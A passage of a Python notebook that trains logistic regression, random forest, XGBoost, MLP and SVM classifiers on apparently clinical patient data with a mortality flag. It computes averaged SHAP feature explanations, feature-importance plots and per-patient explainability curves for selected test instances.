print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,XGBoost.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,XGBoost.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,XGBoost.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,XGBoost.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,XGBoost.predict(Xtest)), 6)))
XGBoost_calibrated = CalibratedClassifierCV(XGBoost, method='sigmoid', cv=5)
XGBoost_calibrated.fit(Xtrain,Ytrain)
# -
# #### 4. Train an MLP
# +
from sklearn.neural_network import MLPClassifier
MLP_best = MLPClassifier(hidden_layer_sizes=(80,20,5), max_iter=25, alpha=0.0015, solver='adam', verbose=None, tol=0.00001)
MLP_best.fit(Xtrain,Ytrain)
print("MLP")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,MLP_best.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,MLP_best.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,MLP_best.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,MLP_best.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,MLP_best.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,MLP_best.predict(Xtest)), 6)))
MLP_calibrated = CalibratedClassifierCV(MLP_best, method='sigmoid', cv=5)
MLP_calibrated.fit(Xtrain,Ytrain)
# -
# #### 5. Train an SVC
# +
from sklearn.svm import SVC
SVC_best = SVC(C=5,kernel='rbf',probability=True)
SVC_best.fit(Xtrain,Ytrain)
print("SVM")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,SVC_best.predict(Xtrain)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,SVC_best.predict(Xtrain)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,SVC_best.predict(Xtrain)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,SVC_best.predict(Xtest)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,SVC_best.predict(Xtest)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,SVC_best.predict(Xtest)), 6)))
SVC_best_calibrated = CalibratedClassifierCV(SVC_best, method='sigmoid', cv=5)
SVC_best_calibrated.fit(Xtrain,Ytrain)
# -
# #### 8. Get SHAPs
import shap
shap.initjs()
import warnings
warnings.filterwarnings("ignore")
# ### Chapter 3.4.3: Basic Explainability Outputs - Choosing instances A, B, C
# #### 1. Choose instances A, B and C
test = SVC_best_calibrated.predict_proba(Xtest)[:,1]
test[147]
for i in range(990):
if test[i] > 0.60 and test[i] < 0.65:
if Ytest['expire_flag'].iloc[i] == 0:
print(i)
# #### 2. Get the model outputs for A, B and C
idx = 147
print(LR_calibrated.predict_proba(Xtest)[idx,1])
print(RF_calibrated.predict_proba(Xtest)[idx,1])
print(XGBoost_calibrated.predict_proba(Xtest)[idx,1])
print(MLP_calibrated.predict_proba(Xtest)[idx,1])
output_value = LR_calibrated.predict_proba(Xtest)[idx,1] + RF_calibrated.predict_proba(Xtest)[idx,1] + XGBoost_calibrated.predict_proba(Xtest)[idx,1] + MLP_calibrated.predict_proba(Xtest)[idx,1] + SVC_best_calibrated.predict_proba(Xtest)[idx,1]
output_value /= 5
print("Average Value " + str(output_value))
# #### 3. Get the SHAP outputs
# Get the SHAP values for each domain
LR_SHAP = shap.KernelExplainer(LR_calibrated.predict_proba, shap.kmeans(Xtrain,5))
RF_SHAP = shap.KernelExplainer(RF_calibrated.predict_proba, shap.kmeans(Xtrain,5))
XGB_SHAP = shap.KernelExplainer(XGBoost_calibrated.predict_proba, shap.kmeans(Xtrain,5))
MLP_SHAP = shap.KernelExplainer(MLP_calibrated.predict_proba, shap.kmeans(Xtrain,5))
SVM_SHAP = shap.KernelExplainer(SVC_best_calibrated.predict_proba, shap.kmeans(Xtrain,5))
def return_shaps(X,idx,shap_function):
shap_combined = np.zeros((len(shap_function)+1,X.shape[1]))
expected_value = 0
for i in range(len(shap_function)):
shap_combined[i,:] = shap_function[i].shap_values(X.iloc[idx:idx+1,:])[1]
expected_value += shap_function[i].expected_value[1]/len(shap_function)
# Get the average
shap_combined[-1,:] = np.mean(shap_combined[:len(shap_function),:],axis=0)
#shap.force_plot(expected_value, shap_combined[-1,:], X.iloc[idx:idx+1,:], feature_names=features_chosen)
return shap_combined
shap_values_A = return_shaps(Xtest,86,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP,SVM_SHAP])
shap_values_B = return_shaps(Xtest,404,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP,SVM_SHAP])
shap_values_C = return_shaps(Xtest,147,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP,SVM_SHAP])
shap.initjs()
# Force plot Instance A
shap.force_plot(0.2*(RF_SHAP.expected_value[1] + LR_SHAP.expected_value[1] + XGB_SHAP.expected_value[1] + MLP_SHAP.expected_value[1] + SVM_SHAP.expected_value[1]),
shap_values_A[5,:], Xtest_bef_imp.iloc[86,:], feature_names=features_chosen)
# Force plot Instance B
shap.force_plot(0.2*(RF_SHAP.expected_value[1] + LR_SHAP.expected_value[1] + XGB_SHAP.expected_value[1] + MLP_SHAP.expected_value[1] + SVM_SHAP.expected_value[1]),
shap_values_B[5,:], Xtest_bef_imp.iloc[404,:], feature_names=features_chosen)
# Force plot Instance C
shap.force_plot(0.2*(RF_SHAP.expected_value[1] + LR_SHAP.expected_value[1] + XGB_SHAP.expected_value[1] + MLP_SHAP.expected_value[1] + SVM_SHAP.expected_value[1]),
shap_values_C[5,:], Xtest_bef_imp.iloc[147,:], feature_names=features_chosen)
# #### 4. Print the most important SHAP values
Xtrain_percentiles['Urea Nitrogen']
### Print the set of most important SHAP values
print("Instance A")
for i in np.argsort(np.abs(shap_values_A[5,:]))[::-1][:10]:
print(features_chosen[i] + " Value: %.4f, SHAP: %.4f" % (Xtest_bef_imp.iloc[86,i], shap_values_A[5,i]))
### Print the set of most important SHAP values
print("Instance B")
for i in np.argsort(np.abs(shap_values_B[5,:]))[::-1][:10]:
print(features_chosen[i] + " Value: %.4f, SHAP: %.4f" % (Xtest_bef_imp.iloc[404,i], shap_values_B[5,i]))
### Print the set of most important SHAP values
print("Instance C")
for i in np.argsort(np.abs(shap_values_C[5,:]))[::-1][:10]:
print(features_chosen[i] + " Value: %.4f, SHAP: %.4f" % (Xtest_bef_imp.iloc[147,i], shap_values_C[5,i]))
### Print the set of most important SHAP values
print("Instance C")
for i in np.argsort(np.abs(shap_values_C[5,:]))[::-1][:10]:
print(features_chosen[i] + " %.4f" % (shap_values_C[5,i]) )
# ### 9. Get SHAPs on the model-wide
# #### Feature Importance - Feature Value Plot
# Define a model that only returns the final averaged SHAP value.
def return_shaps_final(X,idx,shap_function):
shap_combined = np.zeros((len(shap_function),X.shape[1]))
expected_value = 0
for i in range(len(shap_function)):
shap_combined[i,:] = shap_function[i].shap_values(X.iloc[idx:idx+1,:])[1]
expected_value += shap_function[i].expected_value[1]/len(shap_function)
# Get the average
shap_combined_final = np.mean(shap_combined[:len(shap_function),:],axis=0)
shap_combined_final = np.reshape(shap_combined_final, (-1, X.shape[1]))
return shap_combined_final
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population = np.zeros((990,89))
for i in range(990):
shap_population[i,:] = return_shaps_final(Xtest,i,[LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_LR = np.zeros((990,89))
for i in range(990):
if i%10 == 0:
print(i)
shap_population_LR[i,:] = return_shaps_final(Xtest,i,[LR_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_RF = np.zeros((990,89))
for i in range(990):
if i%10 == 0:
print(i)
shap_population_RF[i,:] = return_shaps_final(Xtest.iloc[:990,:],i,[RF_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_XGB = np.zeros((990,89))
for i in range(990):
if i%10 == 0:
print(i)
shap_population_XGB[i,:] = return_shaps_final(Xtest.iloc[:990,:],i,[XGB_SHAP])
# + jupyter={"outputs_hidden": true}
# Get a bunch of SHAP values for the entire population
shap_population_MLP = np.zeros((990,89))
for i in range(990):
if i%10 == 0:
print(i)
shap_population_MLP[i,:] = return_shaps_final(Xtest.iloc[:990,:],i,[MLP_SHAP])
# -
shap_population_LR
# ### Chapter 3.4.4 FI - FV Curves
exp_A = 0.25*((shap_population_LR) + (shap_population_RF) + (shap_population_XGB) + (shap_population_MLP))[147,:]
exp_A
exp_A[np.argsort(exp_A)[::-1]]
features_chosen[np.argsort(exp_A)[::-1]]
_ = return_important_features(exp_A,features_chosen,16)
test
test = Xtest.iloc[147:148,:].copy()
print(MLP_calibrated.predict_proba(test))
test['MCHC'] = 0.35
print(MLP_calibrated.predict_proba(test))
# #### Plot a scatter plot of features
import seaborn as sns; sns.set(color_codes=True)
# #### Feature 1: Age
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[0]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
mask = plot_X > 5
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# ### Chapter 3.4.4 FI-FV Plots
# #### Feature 2: RDW
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Feature 3
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[2]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Feature 4
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[3]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Plot a graph with a higher level of granularity
# +
Y_pred = np.round(0.2*(LR_calibrated.predict(Xtest) + RF_calibrated.predict(Xtest) + XGBoost_calibrated.predict(Xtest) + MLP_calibrated.predict(Xtest) + SVC_best_calibrated.predict(Xtest)))
## For the RDW feature, split between (1) Ytest and (2) Y_pred
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
# -
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y,hue=Y_pred[mask],style=np.logical_xor(Y_pred[mask],Ytest[mask].values.ravel()).astype(int))
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# #### Fish for something interesting
shap_population_rank
# +
Y_pred = np.round(0.2*(LR_calibrated.predict(Xtest) + RF_calibrated.predict(Xtest) + XGBoost_calibrated.predict(Xtest) + MLP_calibrated.predict(Xtest) + SVC_best_calibrated.predict(Xtest)))
## For the RDW feature, split between (1) Ytest and (2) Y_pred
idx = shap_population_rank[24]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y,hue=Y_pred[mask],style=np.logical_xor(Y_pred[mask],Ytest[mask].values.ravel()).astype(int))
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# -
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
idx = shap_population_rank[1]
ax = sns.kdeplot(plot_X, plot_Y, shade=True)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot')
plt.show()
# ### Chapter 3.4.6 Explainability across Different Models
# +
#### Get basic SHAP values for the four models
# Get a bunch of SHAP values for the entire population
shap_population_LR = np.zeros((990,89))
for i in range(990):
shap_population_LR[i,:] = return_shaps_final(Xtest,i,[LR_SHAP])
shap_population_RF = np.zeros((990,89))
for i in range(990):
shap_population_RF[i,:] = return_shaps_final(Xtest,i,[RF_SHAP])
shap_population_XGB = np.zeros((990,89))
for i in range(990):
shap_population_XGB[i,:] = return_shaps_final(Xtest,i,[XGB_SHAP])
shap_population_MLP = np.zeros((990,89))
for i in range(990):
shap_population_MLP[i,:] = return_shaps_final(Xtest,i,[MLP_SHAP])
# -
# #### 1. Plot Logistic Regression
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_LR[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for Logistic Regression')
plt.show()
# -
# #### 2. Plot Random Forest
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_RF[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for Random Forest')
plt.show()
# -
# #### 3. Plot XGBoost
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_XGB[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for XGBoost')
plt.show()
# -
# #### 4. Plot MLP
# +
# Create the arrays for X and Y, remove NANs
idx = shap_population_rank[1]
plot_X = np.array(Xtest_bef_imp[features_chosen[idx]])
plot_Y = shap_population_MLP[:,idx]
mask = ~np.isnan(plot_X)
plot_X = plot_X[mask]
plot_Y = plot_Y[mask]
import seaborn as sns; sns.set(color_codes=True)
import matplotlib.pyplot as plt
ax = sns.scatterplot(plot_X, plot_Y)
plt.xlabel('Feature Value ' + r'$x_{i,j}$' + ' of ' + features_chosen[idx] )
# frequency label
plt.ylabel('Feature Importance Value, ' + r'$\phi_{i,j}$')
# plot title
plt.title('Feature Importance - Feature Value Plot, for the Multilayer Perceptron')
plt.show()
# +
# Calculate the amount of alignment in models
# -
# ### Chapter 3.4.5 Explainability Curves
import seaborn as sns; sns.set(color_codes=True)
# +
bins = 400
# Define these features
feature_values_A_flip = np.zeros((bins,89)); feature_values_B_flip = np.zeros((bins,89)); feature_values_C_flip = np.zeros((bins,89))
# SHAP values
shap_values_A_exp = np.zeros((bins,89)); shap_values_B_exp = np.zeros((bins,89)); shap_values_C_exp = np.zeros((bins,89))
# -
# #### Patient A
for i in np.argsort(np.abs(shap_values_A[-1,:]))[::-1][:10]:
print(str(i) + " " + features_chosen[i] + ": %.4f" % (shap_values_A[-1,i]))
##
idx = 26;
for i in range(bins):
print(i)
instance_temp = Xtest.iloc[86:87,:].copy()
instance_temp.iloc[:,idx] = i/bins
feature_values_A_flip[i,:] = instance_temp
shap_values_A_exp[i,:] = return_shaps_final(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# +
## Plot the graph
idx = 26; bins = 400;
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Plot SHAP
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_A_all[:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[86,idx],shap_values_A[-1,idx]+0.008,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-0.01), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]),
(Xtest_bef_imp.iloc[86,idx],shap_values_A[-1,idx]-0.01-0.01), xycoords='data',)
# Target Value
plt.plot(min(X[features_chosen[idx]]),shaps_A_all[0,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]])-0.5,shaps_A_all[0,idx]+0.04), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(min(X[features_chosen[idx]]),shaps_A_all[0,idx]),
(min(X[features_chosen[idx]])-0.5,shaps_A_all[0,idx]+0.03), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (Xtest_bef_imp.iloc[86,idx],-0.05), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(Xtest_bef_imp.iloc[86,idx],-0.06), xycoords='data',
xytext=(Xtest_bef_imp.iloc[86,idx]+8,-0.06), textcoords='data',
arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for RDW, $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.grid(b=None)
plt.show()
# + active=""
# ##
# idx = 26;
# shaps_A_LR = np.zeros((bins,89)); shaps_A_RF = np.zeros((bins,89));
# shaps_A_XGB = np.zeros((bins,89)); shaps_A_MLP = np.zeros((bins,89)); shaps_A_all = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[86:87,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_A_temp = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_A_LR[i,:] = shaps_A_temp[0,:];shaps_A_RF[i,:] = shaps_A_temp[1,:];
# shaps_A_XGB[i,:] = shaps_A_temp[2,:];shaps_A_MLP[i,:] = shaps_A_temp[3,:];
# shaps_A_all[i,:] = shaps_A_temp[-1,:]
# +
## Plot the graph
idx = 26; bins = 400;
import matplotlib.pyplot as plt
plt.figure(figsize=(8,6), dpi=100)
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_A_LR[:,idx], label='Logistic Regression')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_A_RF[:,idx], label='Random Forest')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_A_XGB[:,idx], label='XGBoost')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_A_MLP[:,idx], label='Multilayer Perceptron')
#plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins), shaps_A_all[:,idx], label='All')
plt.xlabel('Feature Value for RDW, $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.legend()
plt.grid(b=None)
plt.show()
# +
## Plot the graph
idx = 36; bins = 200;
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Plot SHAP
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_A_all_2[:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]+0.011,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-0.005+0.007), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]+0.011),
(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-0.01+0.007), xycoords='data',)
# Target Value
plt.plot(max(X[features_chosen[idx]]), shaps_A_all_2[bins-1,idx],'o')
plt.annotate('Target', (max(X[features_chosen[idx]])-80,shaps_A_all_2[bins-1,idx]+0.015), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(max(X[features_chosen[idx]]),shaps_A_all_2[bins-1,idx]),
(max(X[features_chosen[idx]])-80,shaps_A_all_2[bins-1,idx]+0.01), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (250,0.027), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(400,0.03), xycoords='data',
xytext=(200,0.03), textcoords='data',
arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for ' + features_chosen[idx]+ ', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.grid(b=None)
plt.show()
# +
## Plot the graph
idx = 24; bins = 200;
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
# Plot SHAP
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins)[2:],
shaps_A_all_3[2:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx],"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-.002), xycoords='data', )
plt.annotate("(%.2f,%.4f)" %(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]),
(Xtest_bef_imp.iloc[86,idx],shap_values_A[5,idx]-.003), xycoords='data',)
# Target Value
plt.plot(min(X[features_chosen[idx]]), shaps_A_all_3[2,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]])+0.5,shaps_A_all_3[2,idx]+0.001), xycoords='data', )
plt.annotate("(%.2f,%.4f)" %(min(X[features_chosen[idx]]),shaps_A_all_3[2,idx]),
(min(X[features_chosen[idx]])+0.5,shaps_A_all_3[2,idx]), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (Xtest_bef_imp.iloc[86,idx]-1,0.019), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(Xtest_bef_imp.iloc[86,idx]-2, 0.02), xycoords='data',
xytext=(Xtest_bef_imp.iloc[86,idx]+2,0.02), textcoords='data',
arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for ' + features_chosen[idx]+ ', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient A')
plt.grid(b=None)
plt.show()
# + active=""
# ## Calculate the second feature
# idx = 36; bins = 200;
# shaps_A_LR_2 = np.zeros((bins,89)); shaps_A_RF_2 = np.zeros((bins,89));
# shaps_A_XGB_2 = np.zeros((bins,89)); shaps_A_MLP_2 = np.zeros((bins,89)); shaps_A_all_2 = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[86:87,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_A_temp_2 = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_A_LR_2[i,:] = shaps_A_temp_2[0,:];shaps_A_RF_2[i,:] = shaps_A_temp_2[1,:];
# shaps_A_XGB_2[i,:] = shaps_A_temp_2[2,:];shaps_A_MLP_2[i,:] = shaps_A_temp_2[3,:];
# shaps_A_all_2[i,:] = shaps_A_temp_2[-1,:]
# + active=""
# ## Calculate the third feature
# idx = 24; bins = 200;
# shaps_A_LR_3 = np.zeros((bins,89)); shaps_A_RF_3 = np.zeros((bins,89));
# shaps_A_XGB_3 = np.zeros((bins,89)); shaps_A_MLP_3 = np.zeros((bins,89)); shaps_A_all_3 = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[86:87,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_A_temp_3 = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_A_LR_3[i,:] = shaps_A_temp_3[0,:];
# shaps_A_RF_3[i,:] = shaps_A_temp_3[1,:];
# shaps_A_XGB_3[i,:] = shaps_A_temp_3[2,:];
# shaps_A_MLP_3[i,:] = shaps_A_temp_3[3,:];
# shaps_A_all_3[i,:] = shaps_A_temp_3[-1,:]
# -
# #### Patient B
for i in np.argsort(np.abs(shap_values_B[-1,:]))[::-1][:10]:
print(str(i) + " " + features_chosen[i] + ": %.4f" % (shap_values_B[-1,i]))
# + active=""
# ##
# idx = 32;
# shaps_B_LR = np.zeros((bins,89)); shaps_B_RF = np.zeros((bins,89));
# shaps_B_XGB = np.zeros((bins,89)); shaps_B_MLP = np.zeros((bins,89)); shaps_B_all = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[404:405,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_B_temp = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_B_LR[i,:] = shaps_B_temp[0,:];shaps_B_RF[i,:] = shaps_B_temp[1,:];
# shaps_B_XGB[i,:] = shaps_B_temp[2,:];shaps_B_MLP[i,:] = shaps_B_temp[3,:];
# shaps_B_all[i,:] = shaps_B_temp[-1,:]
# +
## Plot the graph
idx = 32; bins = 400
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
